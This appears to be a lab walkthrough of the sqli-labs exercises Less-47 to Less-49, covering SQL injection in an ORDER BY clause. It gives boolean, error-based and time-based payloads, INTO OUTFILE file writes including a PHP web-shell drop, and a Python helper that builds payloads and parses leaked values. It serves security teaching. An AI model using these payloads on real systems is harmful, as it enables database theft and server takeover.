SQL injection: Sqli-labs series Less-47, Less-48 and Less-49 (ORDER BY injection)

0x1 Source-code difference

The sort value is now placed inside single quotes, so $id is handled as a string (Less-46 used the bare ORDER BY $id):
$sql = "SELECT * FROM users ORDER BY '$id'";

0x2 Example tests

(1) Boolean inference with and + rand()

payload:
http://localhost/sqli-labs-master/Less-47/?sort=1' and rand(ascii(left(database(),1))=116)--+

The comparison evaluates to 1 or 0, so the ORDER BY expression becomes rand(1) or rand(0) and the rows come back in a different order depending on whether the guess is right. Note that the lab's default database is security, whose first character s is ASCII 115, so this payload as written is a false guess; compare the page returned for 116 with the one returned for 115.

(2) Error-based (double query)

http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (select 1 from(select count(*),concat(0x5c,database(),0x5c,floor(rand(0)*2))x from information_schema.tables group by x)a)--+

A statement taken from the Internet:
http://localhost/sqli-labs-master/Less-47/?sort=1' and (select count(*) from information_schema.columns group by concat(0x3e,0x3e,(select database()),0x3e,0x3e,floor(rand()*2)) limit 0,1)--+

Both rely on the duplicate-key error raised by GROUP BY over floor(rand()*2): the leaked value shows up in the message "Duplicate entry '...' for key 'group_key'". With the seed fixed (rand(0)) the error is reproducible whenever the grouped table has at least three rows; the unseeded rand() variant only fails some of the time, so the request may have to be resent.

     

(3) Alternative error-based statement

http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x)--+

Selecting two NAME_CONST() columns with the same name makes MySQL reject the derived table with "Duplicate column name '<version>'", so the server version is leaked through the error. NAME_CONST() only accepts constant arguments, which is why version() is used here rather than an arbitrary subquery.
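As an added example (not code from the original post), the Python helpers below build the two error-based payloads above with a configurable expression and pull the leaked value back out of the MySQL error text. The target URL is assumed from the page's own payloads; 0x7e (~) is used as the delimiter instead of 0x5c so the value can be matched without worrying about backslash escaping, and the response text at the bottom is constructed, not captured from a server.

```python
import re
import urllib.parse

# Assumed target, taken from the page's payloads; adjust for your lab.
BASE_URL = "http://192.168.232.135/sqli-labs/Less-47/"


def double_query_payload(expr: str) -> str:
    """ORDER BY-context double-query payload for Less-47 (quoted sort value).

    `expr` is the SQL expression to leak, e.g. "database()" or
    "(select username from users limit 0,1)". GROUP BY over
    floor(rand(0)*2) collides on the third grouped row, and MySQL echoes
    the colliding key, ~<value>~<0|1>, in the error message.
    """
    return (
        "1' and (select 1 from (select count(*),"
        f"concat(0x7e,({expr}),0x7e,floor(rand(0)*2))x "
        "from information_schema.tables group by x)a)--+"
    )


def name_const_payload() -> str:
    """Duplicate-column variant: NAME_CONST() needs constant arguments,
    so version() is the usual value to leak this way."""
    return ("1' and (select * from (select NAME_CONST(version(),1),"
            "NAME_CONST(version(),1))x)--+")


def build_url(payload: str) -> str:
    # Keep '+' unencoded so the server turns '--+' into '-- ' (a valid comment).
    return BASE_URL + "?sort=" + urllib.parse.quote(payload, safe="+")


# "Duplicate entry '~security~1' for key 'group_key'" (MySQL 5.x) or
# "... for key '<group_key>'" (MySQL 8): capture what sits between the ~ markers.
DUP_ENTRY = re.compile(r"Duplicate entry '~(.*?)~[01]' for key")
DUP_COLUMN = re.compile(r"Duplicate column name '([^']*)'")


def extract_leak(response_text: str):
    """Return the value leaked through either error message, or None."""
    m = DUP_ENTRY.search(response_text) or DUP_COLUMN.search(response_text)
    return m.group(1) if m else None


if __name__ == "__main__":
    print(build_url(double_query_payload("database()")))
    # Constructed response, shaped like sqli-labs' mysql_error() output.
    sample = ("<font color='#FFFF00'>Duplicate entry '~security~1' "
              "for key 'group_key'</font>")
    print(extract_leak(sample))  # security
```

Swap the expression passed to double_query_payload() to walk tables and columns (for example "(select table_name from information_schema.tables where table_schema=database() limit 0,1)"); the error message truncates long keys, so keep each leaked value short.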

(4) Time-based (delay) injection

http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (if(ascii(substr(database(),1,1))=116,0,sleep(5)))--+

Here the response is delayed when the guess is wrong (sleep() sits in the else branch). Because the expression is part of ORDER BY, sleep() runs once per row of users, so the total delay is the row count times 5 seconds; use a small sleep value against larger tables.

(5) Writing a file with INTO OUTFILE

http://localhost:81/sqli-labs-master/Less-47/index.php?sort=1' into outfile "C:/testphp/Apache24/htdocs/sqli-labs-master/Less-47/test.txt"

The trailing quote appended by the source still has to be neutralised (for example with --+), the MySQL account needs the FILE privilege, secure_file_priv must not exclude the directory, and the target file must not already exist.

Writing a web shell

The same statement can drop a script into the web root instead of a dump of the users rows; the hexadecimal string appended to the payload decodes to <?php phpinfo();?>.

0x3 Less-48

Less-48 is the blind version of Less-46: the sort value is used unquoted (ORDER BY $id) and no error messages are shown, so the error-based payloads give no feedback and only the boolean (rand) and time-based techniques remain; INTO OUTFILE can still be used. Because the parameter is numeric, the payload drops the closing quote:

http://192.168.232.135/sqli-labs/Less-48/?sort=1 and (if(ascii(substr((select username from users limit 0,1),1,1))=69,0,sleep(1)))--+

0x4 Less-49

Less-49 is the blind version of Less-47: the sort value is quoted (ORDER BY '$id') and no error messages are shown, so the quote is broken out of exactly as in Less-47 and the answer is read from the response time (or from the row order):

http://192.168.232.135/sqli-labs-master/Less-49/?sort=1' and (if(ascii(substr((select username from users limit 0,1),1,1))=69,0,sleep(1)))--+

The first username in users is Dumb (D is ASCII 68), so this payload sleeps; with 68 the page returns without delay.
Original URL: https://www.cnblogs.com/AmoBlogs/p/8725793.html